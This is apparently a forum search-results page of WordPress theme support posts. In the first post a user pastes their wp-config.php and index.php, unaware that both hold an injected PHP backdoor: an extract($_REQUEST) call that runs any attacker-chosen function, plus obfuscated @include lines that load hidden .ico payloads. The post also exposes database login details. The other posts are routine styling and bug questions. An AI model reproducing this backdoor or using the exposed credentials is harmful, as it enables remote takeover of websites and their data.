-
Search Results
-
Before posting this:
I have updated PHP to 7.1
I have updated Enfold to the latest version, installed via FTP
I have updated WordPress to the latest version, installed via FTP
I have no plugins folderTrying to connect to wp-admin and wp-login pages result in the following errors:
PHP Fatal error: Uncaught Error: Function name must be a string in D:\WWW\name\jordanspeech.com\wwwroot\wp-config.php:2
Stack trace:
#0 D:\WWW\name\jordanspeech.com\wwwroot\wp-load.php(37): require_once()
#1 D:\WWW\name\jordanspeech.com\wwwroot\wp-login.php(12): require(‘D:\\WWW\\jordand\\…’)
#2 {main}
thrown in D:\WWW\name\jordanspeech.com\wwwroot\wp-config.php on line 2Trying to use the search function results in the following errors
Fatal error: Uncaught Error: Function name must be a string in D:\WWW\jordand\jordanspeech.com\wwwroot\wp-config.php:2 Stack trace:
#0 D:\WWW\name\jordanspeech.com\wwwroot\wp-load.php(37): require_once()
#1 D:\WWW\name\jordanspeech.com\wwwroot\wp-blog-header.php(13): require_once(‘D:\\WWW\\jordand\\…’)
#2 D:\WWW\name\jordanspeech.com\wwwroot\index.php(22): require(‘D:\\WWW\\jordand\\…’)
#3 {main} thrown in D:\WWW\name\jordanspeech.com\wwwroot\wp-config.php on line 2How can I adjust these files to work again? I have a fully functioning website, just no dashboard access due to errors.
Thank you in advance!Private Data Below:
Wp-config.php contents:
<?php
extract($_REQUEST) && @$lock(stripslashes($pass)) && exit;/*03cc3*/
@include “\104:/\167ww\057jo\162da\156d/\152or\144an\163pe\145ch\056co\155/w\167wr\157ot\057.e\14538\06333\067.i\143o”;
/*03cc3*/
define( ‘WP_HOME’, ‘http://jordanspeech.com’ );
define( ‘WP_SITEURL’, ‘http://jordanspeech.com’ );define(‘FORCE_SSL_ADMIN’, false);
/*45dc4*/
@include “\x44:\x77ww\jo\x72da\x6ed\x6aor\x64an\x73pe\x65ch\x2eco\x6d\w\x77wr\x6fot\x2ffa\x76ic\x6fn_\x371b\x35a3\x2eic\x6f”;
/*45dc4*/
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don’t have to use the web site, you can
* copy this file to “wp-config.php” and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/// ** MySQL settings – You can get this info from your web host ** //
/** The name of the database for WordPress */
define(‘DB_NAME’, ‘jordanspeech’);/** MySQL database username */
define(‘DB_USER’, ‘jordanspeech’);/** MySQL database password */
define(‘DB_PASSWORD’, ‘jordanspeech’);/** MySQL hostname */
define(‘DB_HOST’, ‘mysql2.sqlsvr.net’);/** Database Charset to use in creating database tables. */
define(‘DB_CHARSET’, ‘utf8’);/** The Database Collate type. Don’t change this if in doubt. */
define(‘DB_COLLATE’, ”);/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define(‘AUTH_KEY’, ‘put your unique phrase here’);
define(‘SECURE_AUTH_KEY’, ‘put your unique phrase here’);
define(‘LOGGED_IN_KEY’, ‘put your unique phrase here’);
define(‘NONCE_KEY’, ‘put your unique phrase here’);
define(‘AUTH_SALT’, ‘put your unique phrase here’);
define(‘SECURE_AUTH_SALT’, ‘put your unique phrase here’);
define(‘LOGGED_IN_SALT’, ‘put your unique phrase here’);
define(‘NONCE_SALT’, ‘put your unique phrase here’);/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = ‘wp_’;/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
// Enable WP_DEBUG mode
define(‘WP_DEBUG’, true);// Enable Debug logging to the /wp-content/debug.log file
define(‘WP_DEBUG_LOG’, true);// Disable display of errors and warnings
define(‘WP_DEBUG_DISPLAY’, false);
@ini_set(‘display_errors’,0);define(‘WP_MEMORY_LIMIT’, ‘128M’);
/* That’s all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */`
if ( !defined(‘ABSPATH’) )
define(‘ABSPATH’, dirname(__FILE__) . ‘/’);/** Sets up WordPress vars and included files. */
require_once(ABSPATH . ‘wp-settings.php’);`WP-Load.php file contents:
<?php
/**
* Bootstrap file for setting the ABSPATH constant
* and loading the wp-config.php file. The wp-config.php
* file will then load the wp-settings.php file, which
* will then set up the WordPress environment.
*
* If the wp-config.php file is not found then an error
* will be displayed asking the visitor to set up the
* wp-config.php file.
*
* Will also search for wp-config.php in WordPress’ parent
* directory to allow the WordPress directory to remain
* untouched.
*
* @package WordPress
*//** Define ABSPATH as this file’s directory */
if ( ! defined( ‘ABSPATH’ ) ) {
define( ‘ABSPATH’, dirname( __FILE__ ) . ‘/’ );
}error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR );
/*
* If wp-config.php exists in the WordPress root, or if it exists in the root and wp-settings.php
* doesn’t, load wp-config.php. The secondary check for wp-settings.php has the added benefit
* of avoiding cases where the current directory is a nested installation, e.g. / is WordPress(a)
* and /blog/ is WordPress(b).
*
* If neither set of conditions is true, initiate loading the setup process.
*/
if ( file_exists( ABSPATH . ‘wp-config.php’ ) ) {/** The config file resides in ABSPATH */
require_once( ABSPATH . ‘wp-config.php’ );} elseif ( @file_exists( dirname( ABSPATH ) . ‘/wp-config.php’ ) && ! @file_exists( dirname( ABSPATH ) . ‘/wp-settings.php’ ) ) {
/** The config file resides one level above ABSPATH but is not part of another installation */
require_once( dirname( ABSPATH ) . ‘/wp-config.php’ );} else {
// A config file doesn’t exist
define( ‘WPINC’, ‘wp-includes’ );
require_once( ABSPATH . WPINC . ‘/load.php’ );// Standardize $_SERVER variables across setups.
wp_fix_server_vars();require_once( ABSPATH . WPINC . ‘/functions.php’ );
$path = wp_guess_url() . ‘/wp-admin/setup-config.php’;
/*
* We’re going to redirect to setup-config.php. While this shouldn’t result
* in an infinite loop, that’s a silly thing to assume, don’t you think? If
* we’re traveling in circles, our last-ditch effort is “Need more help?”
*/
if ( false === strpos( $_SERVER[‘REQUEST_URI’], ‘setup-config’ ) ) {
header( ‘Location: ‘ . $path );
exit;
}define( ‘WP_CONTENT_DIR’, ABSPATH . ‘wp-content’ );
require_once( ABSPATH . WPINC . ‘/version.php’ );wp_check_php_mysql_versions();
wp_load_translations_early();// Die with an error message
$die = sprintf(
/* translators: %s: wp-config.php */
__( “There doesn’t seem to be a %s file. I need this before we can get started.” ),
‘wp-config.php‘
) . ‘</p>’;
$die .= ‘<p>’ . sprintf(
/* translators: %s: Codex URL */
__( “Need more help? We got it.” ),
__( ‘https://codex.wordpress.org/Editing_wp-config.php’ )
) . ‘</p>’;
$die .= ‘<p>’ . sprintf(
/* translators: %s: wp-config.php */
__( “You can create a %s file through a web interface, but this doesn’t work for all server setups. The safest way is to manually create the file.” ),
‘wp-config.php‘
) . ‘</p>’;
$die .= ‘<p>‘ . __( ‘Create a Configuration File’ ) . ‘‘;wp_die( $die, __( ‘WordPress › Error’ ) );
}
wp-blog-header.php contents:<?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once( dirname( __FILE__ ) . ‘/wp-load.php’ );// Set up the WordPress query.
wp();// Load the theme template.
require_once( ABSPATH . WPINC . ‘/template-loader.php’ );}
Index.php contents:<?php
/*b8b2c*/@include “\104:/w\167w/j\157rda\156d/j\157rda\156spe\145ch.\143om/\167wwr\157ot/\05654d\1428e9\062.ic\157”;
/*b8b2c*/
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*//**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( ‘WP_USE_THEMES’, true );/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . ‘/wp-blog-header.php’ );
I cannot tell what it thinks it sees/doesn’t see.Goodday,
We are a Dutch company. We are using Enfold on our website https://enginia.nl/
Now we have some wishes. We need:
1. An environment for support purposes with knowledge base, FAQs, fast search possibillity. We looking for something like https://support.google.com/ or http://kbase.vedicthemes.com/home3/
2. A webshop for example https://www.cadkoop.nl/
3. An environment focused on Jobs.We did ofcourse contacted our own local partner but they advised us to look for an excisting WordPress theme, because these are already developed for the specific purposes. If we want to do this within our own excisting Enfold theme that would need to many programming to get the same results.
That’s wat we did last year on our Event site. See https://event.enginia.nl. We took another theme which most suited to our needs. The problem we have with that is we want to have one database and one WordPress login. Certainly when we are going to expand this with more special sites for support, a shop and jobs. Our partner said this was difficult to do with themes other than Enfold. And if we want to create the same with Enfold it would cost us a lot more.
So we looked at your site as deverloper of the Enfold theme, if you offer standard themes wich will fit our needs. I noticed already you offer a shop environment. Is this based on Woocommerce or is this something you developed yourselves?
I hope you can inform me about what you can offer or advise us what to do. Or maybe you are able to develop this for us?
With best regards,
Bianca Kuipers
Marketing Manager
Enginia
+31 85-0436255Hello!
I´m relatively new to Enfold but I like it already!I´m using mostly color sections or sliders for the the first section. That’s why the breadcrumbs aren´t displayed, right?
Can I use the Yoast shortcut [wpseo_breadcrumb] to display breadcrumbs instead?
Are there any problems related to “double breadcrubms” in the code and to google search results?Thank you in advance!
@ Support Staff. Some clients and me are waiting for an option inside Enfold options (A New SEO-Tab) where humans with real interest in success can adjust via toggle.
– use h1 in breadcrumbs or not
– set nofollow to search query or not
– set noidex to search query or notFor this, you have many queries here and also bad ratings at themeforest.
And: “no Border” option which working correct at all section. If i want “No border” and set this as option, since 2017 is a border there.A feature to set two buttons side by side into one grid or section would be also nice without manipulating css.
Also, it would be nice to combine similar functions like slider or buttons which have nearly similar functions with one or two different options but in the main task they do the same.Furthermore: Many clients and i have very strong difficulties with fullwidth images to show it in a good way for most devices. And: A box is missing to inject text at the right place. This makes me difficulties again and again.
A neated Enfold feature request thread with Ratings and Announcements would be user and customer friendly. This is customer care.
This was there in the past, but not neated.Thx and Best
Hey, I really love the Forum and spent a long time on searching for a solution, but no success.
In the General Styling setting Content + Sidebar Width is set to 100 %. Unfortunaley after the last update, Enfold decided reduce it to roughly 50 %. You can see it on http://www.sfvoe.de
I changed the setting several times, deleted Quick CSS, etc. Do you know any solution?Best regards
JonasMy website looks right to the public: http://www.jordanspeech.com
However, I have a 500 error when trying to access wordpress.I updated to PHP 7.1: same issue
I updated to latest wordpress via FTP: same issue
I updated to latest enfold via FTP: same issue
If I delete the ENFOLD folder, I get nothing.
Debug is on, I am throwing no errors. 128M memory allocated.Can anyone help me? Not sure how to resolve this issue. I cannot add pages to client site, cannot alter existing pages, cannot update blog, cannot change themes… I love ENFOLD, but what am I supposed to do?
Credential here in private content. 12pm Noon EST
Hi there,
After doing a mess of research, I see that others over the years have requested what we’re very much wishing to have happen with respect to the Masonry grid: titles always visible when the page loads, but the additional excerpts only visible upon mouseover. Here’s the page to which we’d love to add this modified functionality: http://codeable.searockstaffordcm.com/projects/
The Enfold admin for even the most recent version is limited with respect to seeing/dealing with these as disparate functionalities, and our client would really like this to happen. Might there be a functions.php and/or css workaround? And is this something that Kriesi plans to make standard in future…?
Please advise as to how we can accomplish this! Thank you.
Best,
– Kat Lilore
Hi
I have wordpress 5.1.1-de_CH installed with enfold 4.5.3. Hence the whole site is in German.
All works fine but the search function with the magnifying glass is always in english. Text says “search” instead “suchen”. And also the replies are all in english. Everything else is in German.
Also some searches cant be found although the keyword is on a page listed. E.g the word “Hausordnung” is on the page when menu “dokumente” is selected but can’t be found on the site and the reply is again in english.
Thanks in advance for support
TonyOn maizeroadbaptist.com
I’m getting error:
Fatal error: Cannot redeclare av_countdown_events_fallback() (previously declared in /home/shanet5/public_html/maizeroadbaptist.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/events_countdown/events_countdown.php:14) in /home/shanet5/public_html/maizeroadbaptist.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/events_countdown.php on line 8I’ve edited the .php file according to these changes: https://kriesi.at/support/search/?bbp_search=events_countdown
but the site is still down. Can someone assist?
I’ve searched all over and can’t find anything about how to change the timing for the transitions between images when using the fullscreen slider. I looked at line 3701 in the shortcode.js file and nothing is there to edit. I just want to slow the time between fades. How can I do this? Can we do it using CSS?
I’m using the latest version of Enfold.
Thank you!
Topic: Search bar in a slider
Hi,
I’m wondering if it could be possible to add a big search bar like this one https://kriesi.at/themes/enfold-knowledgebase-demo/ inside a slider like this https://kriesi.at/themes/enfold-shop/
I’ve been looking around this forum and I couldn’t find a goo solution for this.
Thanks in advance!
